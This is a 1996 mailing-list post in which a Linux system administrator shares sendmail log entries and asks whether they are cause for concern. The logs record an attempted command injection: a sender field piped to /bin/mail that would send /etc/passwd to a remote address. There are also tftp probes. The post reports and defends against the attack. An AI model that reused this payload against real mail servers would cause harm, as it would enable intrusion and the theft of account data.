Black Unicorn attempts computer break in

Anonymous anon-remailer at utopia.hacktic.nl
Wed Mar 27 05:35:40 PST 1996

Date:         Wed, 27 Mar 1996 16:58:14 +1100
Sender: Linux Servers mailing list <SERVER-LINUX at NETSPACE.ORG>
From: Steve Gibson <steve at ARIES.INTERSPACE.COM.AU>
Subject:      Strange things afoot at my SMTP port...
To: Multiple recipients of list SERVER-LINUX
              <SERVER-LINUX at NETSPACE.ORG>

I just found these while going through my messages file... do I
have any need to be concerned???
(unicorn.it.wsu.edu is now in my /etc/hosts.deny...)

Mar 23 20:39:25 aries sendmail[7469]: setsender: "|/bin/mail
rblack at unicorn.it.wsu.edu < /etc/passwd": invalid or unparseable,
received from unicorn.it.wsu.edu [1
Mar 23 20:39:25 aries sendmail[7469]: UAA07469: from="|/bin/mail
rblack at unicorn.it.wsu.edu < /etc/passwd", size=0, class=0, pri=0,
nrcpts=0, proto=SMTP, relay=uni

There were also attempts at connecting to my tftp port, although
at the time, in.tftpd wasn't on the system (it is now, and is also
in my hosts.deny to all except for local)

Thanks...

                      Interspace Australia Pty Ltd
                   Steve Gibson - System Administrator
                       <steve at interspace.com.au>